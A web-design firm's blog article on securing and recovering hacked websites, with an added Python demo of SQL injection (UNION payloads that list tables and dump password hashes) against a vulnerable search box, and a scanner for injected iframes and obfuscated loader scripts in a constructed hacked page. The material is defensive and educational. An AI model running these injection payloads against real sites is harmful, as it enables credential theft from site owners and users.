Website Hacking and Prevention
Part 2: Prevention & Recovery
How do I secure my website from attacks?
Although no website is 100% secure, there are many steps you can take to guard your site from the vast majority of threats. Firstly, if you are using a CMS, check regularly for the patches and updates its maintainers release, and apply them promptly. In some cases it is worth upgrading to a newer major version of the system (e.g. Joomla 1.5 vs Joomla 2.5). Migrating an existing site to a newer CMS may require a more experienced web developer, but the effort is worth the payoff: versions of a CMS that have been around for a few years and have publicly known vulnerabilities WILL be exploited if they are not patched or upgraded. Attackers count on site owners and administrators neglecting to apply updates and the security fixes that come with them. Once a vulnerability is public, automated scanners hunt for unpatched copies of the affected version; nobody has to single your site out for it to be hit.
Strong usernames and passwords are also crucial. Default usernames such as "admin" should be changed to something unique, and passwords should be long, combine lower- and uppercase letters with digits and special characters, and never be reused on another site. Using default usernames and/or common passwords dramatically increases the odds of an automated system guessing its way into your account: brute-force tools try "admin" against lists of common passwords on every login page they find, so a site that keeps the default username has already handed over half of the credential.
Often your CMS will offer an option to use a database table prefix. Systems like WordPress use a standard naming convention for the tables in the database; a table prefix prepends a string of your choosing to the name of every table created in that database (e.g. users vs mysite_users). This means your database no longer uses the default names that canned attack scripts assume, so a mass-produced SQL injection that blindly queries the stock table name may fail to retrieve anything. Treat this as a speed bump rather than a defence: an attacker who has found an injection point can usually list the real table names from the database's own catalogue (information_schema in MySQL), so the prefix buys nothing against a hand-driven attack. It only helps in combination with the measures described next.
To protect your website from SQL injection in general, your developer or DBA (Database Administrator) should be familiar with security best practices. The essential one is never to build a SQL statement by gluing user-supplied text into the query string. Instead, use prepared statements / parameterized queries (or stored procedures that take parameters), so that the database receives the query structure and the user's data separately and the data can never be interpreted as SQL, whatever characters it contains. Server-side input validation (type, length, allowed characters) is a valuable second layer, and client-side form validation improves the user experience, but neither is a substitute for parameterization: client-side checks run in the attacker's browser and are trivially bypassed, and "sanitizing" by stripping or escaping quotes by hand is error-prone. In any case, the important thing is a barrier between your website and your database that keeps YOU in control of any request for data, not the person or robot on the outside.
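The two paragraphs above, as an added example that is not code from the original article or from Back2Front: a search box implemented two ways, and the attack an automated script or a human would run against each. Python's built-in sqlite3 stands in for the PHP/MySQL stack of a typical CMS; the table prefix, the sample rows and the search functions are all constructed for the demonstration. The catalogue table is sqlite_master here; on MySQL the same step queries information_schema.tables.

```python
import sqlite3

# Assumed table prefix, as a CMS would prepend to every table it creates.
PREFIX = "mysite_"


def setup(prefix=PREFIX):
    """Build a tiny in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {prefix}users "
                 "(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.execute(f"INSERT INTO {prefix}users (username, password_hash) "
                 "VALUES ('admin', 'h4sh-of-admin-pw')")
    conn.execute(f"CREATE TABLE {prefix}posts "
                 "(id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute(f"INSERT INTO {prefix}posts (title, body) "
                 "VALUES ('Hello', 'First post')")
    conn.commit()
    return conn


def search_posts_vulnerable(conn, term):
    # VULNERABLE: the visitor's search term is pasted straight into the SQL
    # text, so a quote in it ends the string literal and the rest of the
    # term is executed as SQL.
    sql = f"SELECT title, body FROM {PREFIX}posts WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_posts_safe(conn, term):
    # SAFE: parameterized query. The table name comes from a trusted constant;
    # the '?' placeholder is filled by the driver with the term as DATA, so
    # quotes or SQL keywords inside it can never change the query.
    sql = f"SELECT title, body FROM {PREFIX}posts WHERE title LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def attacker_dumps_users(conn, search):
    """What an attacker does to a search box when the prefix is unknown."""
    # Step 1: ask the database catalogue for its table names. The prefix is
    # revealed, not hidden. 'AND 0=1' drops the real posts from the result.
    listing = search(conn, "' AND 0=1 UNION SELECT name, sql FROM sqlite_master "
                           "WHERE type='table' --")
    user_tables = [name for name, _ in listing if name.endswith("users")]
    if not user_tables:
        return []   # injection failed: nothing learned, nothing to dump
    # Step 2: pull credentials out of the table discovered in step 1.
    return search(conn, "' AND 0=1 UNION SELECT username, password_hash "
                        f"FROM {user_tables[0]} --")


if __name__ == "__main__":
    db = setup()
    print("vulnerable:", attacker_dumps_users(db, search_posts_vulnerable))
    print("parameterized:", attacker_dumps_users(db, search_posts_safe))
```

Against the vulnerable function the attacker first reads the prefixed table name out of the catalogue and then dumps the admin's password hash; against the parameterized one the same payloads are just a search term that matches nothing. Note that the prefix played no part in stopping the attack: only the placeholder did.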
At Back2Front, we use a system that follows these best practices. We also offer clients with database-driven websites a means of updating the contents of that database themselves if they choose. Likewise, checks and safeguards are in place that not only ensure data is retrieved in a controlled manner, but also that it is properly formatted when it is entered in the first place. The result is a tightly regulated data structure that maximizes efficiency and security while minimizing the chance of intrusion.
Am I a target?
When it comes to securing your website, one aspect is easily overlooked. Even if you have put every possible safeguard in place to ensure your website cannot be forcibly broken into, those safeguards do little against someone who has obtained your username and password. As discussed above, when a website is hacked it is most often done as a means of directing visitors to malware that infects their computers. That malware may serve a variety of purposes, but a common theme is harvesting credentials stored on the infected machine. This may include anything from banking logins, to information about the computer itself, or in this case the FTP (File Transfer Protocol) login you use to manage your website. Note, too, that plain FTP sends that username and password across the network unencrypted, so anyone on the path can read them; use SFTP or FTPS where your host supports it. Have you ever locked your door but accidentally left the key in the keyhole? Securing your website is important, but nothing stops someone with the key from simply walking in the front door.
Website hacking and the spread of malware work in a cycle: hacked sites direct users to malware, and users infected with that malware often hand cybercriminals the means to hack more websites through stolen FTP credentials, CMS admin credentials, or in many cases email credentials. Keeping this information secure is just as important as securing the website itself. For this reason, consider not storing these credentials on your machine in plain text (FTP clients commonly save them in a configuration file that credential-stealing malware knows exactly where to find) or in an email; write them down and keep them somewhere safe, or use a password manager that stores them encrypted.
Not every user who visits a hacked website will have their computer infected. In fact the majority of users will likely not have a problem. In the background, code injected into the hacked page runs and silently sends the browser to the culprit's malicious content hosted elsewhere. Generally this is an "exploit kit", which receives basic information about the visitor such as the operating system, browser and plugin versions in use. Based on this information, it decides which of the "exploits" packaged in the kit to use. An exploit is a means of infecting a user through a known weakness in their specific software. For example, someone viewing a hacked site with Internet Explorer 7 will be attacked through one exploit, while a user running an old Firefox or an outdated plugin will get another. The likelihood of your being infected depends on how many exploits the kit carries and how exploitable your operating system, browser and plugins are. Depending on the kit, the infection may be completely silent (a so-called drive-by download, where the exploit installs the malware with no prompt at all), or you may be asked to install something disguised as legitimate, such as a browser or plugin update, which is in fact the malware.
To safeguard your machine, common-sense practices go a long way. Firstly, if you use email and browse the internet, antivirus software is a must. There are free and licensed antivirus programs available depending on the level of protection you require. Whichever you use, for personal or business purposes, installing its updates regularly is essential, since it can only recognise what it has definitions for. Likewise, keeping your web browser up to date is very important: it is your first line of defence against infection. The vast majority of infections exploit vulnerabilities in a small handful of applications and platforms, the most common being outdated browsers such as Internet Explorer 7 and older Firefox releases, as well as weaknesses in Adobe Acrobat Reader 9, Flash, QuickTime, and the Java browser plugin. If you use any of these browsers or plugins, install updates and patches as soon as they are released to minimize your risk, and disable or remove plugins you do not actually need. When doing so, however, be critical of where the update is coming from and only install something from the vendor's official site (e.g. www.adobe.com/updates, NOT www.thepluginpeople.com/adobe); a fake "update" prompt appearing on a web page is one of the commonest ways the malware itself is delivered. Also, if you run a business with many office computers, running outdated or vulnerable software with known security issues on them should be discouraged.
My website was hacked, what now?
There are plenty of online resources to guide you through the process of recovering your hacked website, but these general steps should be followed:
- Contact / inform your hosting company.
- Quarantine your site: take it offline or replace it with a static holding page so that visitors stop being exposed while you work.
- Assess the damage: find every file and database row the attacker added or changed, not just the one page that triggered the warning.
- Identify the vulnerability: the outdated CMS, plugin or stolen credential that let them in.
- Clean and maintain your site: remove the injected code, close the hole, change every password, and keep patching afterwards.
It is always good practice to back up your website. If you are using a CMS, there may be a built-in option to back it up periodically; keep the copies somewhere the web server cannot write to, so that an attacker who controls the site cannot alter or delete them. If you or your developer are having trouble identifying or removing the malicious content, it may be easiest to restore the website from a backup taken before the compromise. This does not guarantee you will not be hacked again, since the vulnerability that let the attacker in is still there until it is patched, but it is a possible fallback option.
If your site has been hacked, visitors may see a warning before entering it. Google has systems that scan the web for sites hosting malware or spam content; when such a site is identified, Google warns users of the dangers before they proceed. Although your computer will not necessarily be infected by doing so, it is NOT recommended that you open infected pages in your web browser. Command-line tools such as Wget and cURL let you download a page's raw HTML and inspect it for injected code without your browser executing any of it. Once your site has been diagnosed and cleaned, you may request that Google review it and remove the warning. Most of this process can be done in Google Webmaster Tools. For a full step-by-step guide to getting your site back up and running, visit http://www.google.com/webmasters/hacked.
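An added example, not part of the original article or of Back2Front's tooling, of the "assess the damage" step above using the exploit-kit injection pattern described earlier: fetch the raw HTML without rendering it, then flag the typical signs of injected code (zero-size or hidden iframes, scripts loaded from another host, and obfuscated or encoded script bodies). The two HTML documents are constructed samples of a hacked page and a clean page; the host names in them are placeholders, and the indicator patterns are this example's own heuristics, not a complete malware signature set.

```python
import re
import urllib.request
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r'(\w+)\s*=\s*["\']?([^"\'\s>]+)')
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
# Functions an injected loader uses to rebuild its real payload at run time.
OBFUSCATION_RE = re.compile(r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(")
# Long runs of %XX escapes or base64-looking text inside a script body.
ENCODED_BLOB_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}|[A-Za-z0-9+/]{80,}={0,2}")


def fetch_raw(url, referer="https://www.google.com/"):
    """Download a page's HTML without executing anything in it.

    Injected code is frequently served only to requests that look like a real
    browser arriving from a search engine, so present a browser-like
    User-Agent and a Referer. Equivalent to:
        curl -s -A "<browser UA>" -e https://www.google.com/ URL
    (Not called by the demo below, which works on the constructed samples.)
    """
    req = urllib.request.Request(url, headers={
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
                      "(KHTML, like Gecko) Chrome/27.0 Safari/537.36",
        "Referer": referer,
    })
    with urllib.request.urlopen(req, timeout=20) as resp:
        return resp.read().decode("utf-8", errors="replace")


def attrs(tag_text):
    """Crude attribute parser: enough for the tags this scanner looks at."""
    return {k.lower(): v for k, v in ATTR_RE.findall(tag_text)}


def is_offsite(url, site_host):
    """True when url points at a host other than the site being checked."""
    host = urlparse(url).hostname
    return bool(host) and host.lower() != site_host.lower()


def scan_html(html, site_host):
    """Return (indicator, snippet) pairs for anything that looks injected."""
    findings = []
    for tag in IFRAME_RE.findall(html):
        a = attrs(tag)
        tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
        if tiny or HIDDEN_RE.search(tag):
            findings.append(("hidden-iframe", tag))
        if is_offsite(a.get("src", ""), site_host):
            findings.append(("offsite-iframe", tag))
    for tag_attrs, body in SCRIPT_RE.findall(html):
        a = attrs(tag_attrs)
        if is_offsite(a.get("src", ""), site_host):
            findings.append(("offsite-script", a["src"]))
        if OBFUSCATION_RE.search(body):
            findings.append(("obfuscated-script", body.strip()[:80]))
        if ENCODED_BLOB_RE.search(body):
            findings.append(("encoded-blob", body.strip()[:80]))
    return findings


# Constructed sample of a hacked page: the site's own content followed by a
# hidden off-site iframe, a document.write/unescape loader, an eval'd
# fromCharCode blob and a base64-style payload string. example.invalid is a
# placeholder host; "QUJD" * 25 is filler standing in for an encoded payload.
BLOB = "QUJD" * 25
SAMPLE_HTML = f"""<html><head><title>Acme Widgets</title></head>
<body><h1>Welcome to Acme Widgets</h1><p>Our products and services.</p>
<iframe src="http://example.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://example.invalid/x.js%22%3E%3C/script%3E'));</script>
<script type="text/javascript">eval(String.fromCharCode(100,111,99,117,109,101,110,116));</script>
<script>var p="{BLOB}";</script>
</body></html>"""

# Constructed clean page for comparison: one same-origin script, nothing hidden.
CLEAN_HTML = """<html><head><title>Acme Widgets</title></head>
<body><h1>Welcome to Acme Widgets</h1>
<script src="/js/site.js"></script></body></html>"""


if __name__ == "__main__":
    for kind, snippet in scan_html(SAMPLE_HTML, "www.acme.example"):
        print(f"{kind:18} {snippet}")
    print("clean page findings:", scan_html(CLEAN_HTML, "www.acme.example"))
```

Run it against the real page with scan_html(fetch_raw("http://www.yoursite.example/"), "www.yoursite.example"), and repeat for every page and template of the site, since injections are usually appended to a shared footer or to every PHP file at once. A hit is a lead to investigate, not proof by itself: legitimate analytics and ad code also loads off-site scripts, so compare against a known-good backup of the same file.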
Recently at Back2Front, we received a call from a concerned business owner who had been informed by a client that her website was displaying a malware warning. Her web developer was out of town on vacation, and she needed help with this immediately. After she provided us with the necessary login information and added us as a user on her Google Analytics account, we quickly discovered the issue. The website was built on an earlier version of the Joomla CMS platform which has known security vulnerabilities. We promptly removed the injected code and files from the web host, then submitted a request to Google to review the site for malware using the features in Google Webmaster Tools. Within a few hours, Google had reviewed the site and removed the warning. We recommended that the business owner upgrade her CMS to a more secure version to protect against similar attacks in the future.
In this article we have outlined many of the "hows" and "whys" of website hacking and hopefully demystified the subject to some degree. With Google reporting upwards of 10,000 new websites hosting malware found each day, it is clearly a widespread issue that web builders and users alike need to consider. Education and a secure approach to technology going forward will help ensure the internet continues to be something we can truly rely on every day.
By Mark Davidson, Back2Front - The Web Site People. May 2013